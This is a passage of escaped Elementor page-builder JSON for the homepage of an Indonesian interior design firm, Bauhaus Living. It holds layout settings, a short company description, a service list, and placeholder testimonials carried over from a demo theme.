size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic 